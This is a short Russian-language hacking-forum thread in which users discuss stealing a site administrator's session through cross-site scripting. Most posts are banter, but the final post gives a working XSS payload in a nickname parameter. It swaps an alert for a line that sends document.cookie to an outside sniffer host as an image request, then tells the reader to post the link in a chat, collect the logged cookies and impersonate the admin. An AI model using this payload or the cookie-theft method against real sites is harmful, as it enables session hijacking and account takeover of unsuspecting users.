не актуально

Уязвимость через XSS или CSS

А тебе не кажится что это одно итожа, нзвание XSS поставили потому что бы не путать Cascading Style Shit с Cross Site Scripting.

Ты правильно написал у себе в подписи : Учиться, учиться и еще раз учиться

У тебя же есть скрипты уязвимостей... че тебе еще надо-то?=)

Shit Кхе-кхе...=)))

ДРОН ты непонел ))) ему нужна через xss,взять базу ))))))

ну так пусть берет тока куки пусть получит.

Ты не правильно понел, он Xss путает с СГЛ запросом. Это мне так кажится.

можна только хэш админа поймать

это xss, с помощью неё можно попробовать забрать хэш админа
если получится его взять, то подставляешь данные админа за место своих, и по идее, если нет какой-нибудь навороченной защиты (по ip например), можно пабыть на некоторое время админом, а там уже как получится...

Вобщем, к примеру....
au_nick="><script>alert('wvs-xss-magic-string-2125609660')%3B</script>&nicks=1
В этой строке вместо
alert('wvs-xss-magic-string-2125609660')%3B
пишешь..что-то вроде
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
потом полученную строку кидаешь в чат и идешь смотреть логи сниффера... а потом.. уже описано, что потом.